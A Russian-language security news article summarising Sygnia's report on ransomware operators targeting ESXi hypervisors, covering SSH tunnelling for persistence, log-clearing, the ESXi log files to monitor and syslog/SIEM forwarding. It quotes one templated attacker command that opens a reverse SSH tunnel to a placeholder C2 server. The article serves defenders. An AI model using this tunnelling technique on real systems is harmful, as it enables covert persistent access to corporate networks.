Новости Sygnia: вымогатели атакуют Bare-metal гипервизоры ESXi

[NewsMaker]

Лишь тщательный мониторинг логов может спасти от потери данных.

---

---

<style> code {padding: 2px 5px;border-radius: 3px;background: #5f5f5f;font-family: monospace; }</style> Хакеры, нацеленные на Bare-metal гипервизоры ESXi , используют туннелирование SSH для сохранения доступа к системе и обхода обнаружения. Эти устройства играют критическую роль в виртуализированных средах, позволяя запускать на одном физическом сервере множество виртуальных машин.

Из-за низкого уровня мониторинга гипервизоры ESXi часто становятся объектами атак. Злоумышленники, проникнув в корпоративную сеть, крадут данные и шифруют файлы, фактически парализуя работу компании, делая виртуальные машины недоступными.

Для просмотра ссылки Войди или Зарегистрируйся компании Sygnia , компрометация гипервизоров часто достигается путём эксплуатации известных уязвимостей или использования скомпрометированных учётных данных администраторов. ESXi имеет встроенный SSH-сервис, позволяющий администраторам удалённо управлять гипервизором. Эту функцию злоумышленники используют для организации устойчивого доступа, перемещения по сети и внедрения программ-вымогателей.

Sygnia отмечает, что злоумышленники устанавливают туннели с помощью встроенной функциональности SSH или популярных инструментов, предоставляющих схожие возможности. Пример команды для настройки перенаправления порта:

<code>ssh –fN -R 127.0.0.1:<порт SOCKS> <пользователь>@<IP C2 сервера></code> «ESXi-устройства редко перезагружаются неожиданно, что позволяет использовать такой туннель как полупостоянную точку входа в сеть», — объясняет Sygnia.

Важным фактором успеха атак является сложность мониторинга логов ESXi. В отличие от большинства систем, где логи хранятся в одном файле, ESXi распределяет их по нескольким местам. Это усложняет поиск улик, поскольку данные нужно собирать из множества источников. Для обнаружения активности злоумышленников Sygnia рекомендует проверять следующие файлы:

• /var/log/shell.log — отслеживает выполнение команд в оболочке ESXi;
• /var/log/hostd.log — фиксирует административные действия и аутентификацию пользователей;
• /var/log/auth.log — регистрирует попытки входа и события аутентификации;
• /var/log/vobd.log — хранит системные и информационные события безопасности.

Кроме того, логи hostd.log и vobd.log могут содержать следы изменения правил файервола, что необходимо для сохранения постоянного SSH-доступа. Однако злоумышленники часто очищают журналы, изменяют временные метки или укорачивают логи, чтобы скрыть свои действия.

Для повышения безопасности рекомендуется централизовать логи ESXi с помощью пересылки syslog и интеграции их в систему управления событиями безопасности ( Для просмотра ссылки Войди или Зарегистрируйся ) для выявления аномалий.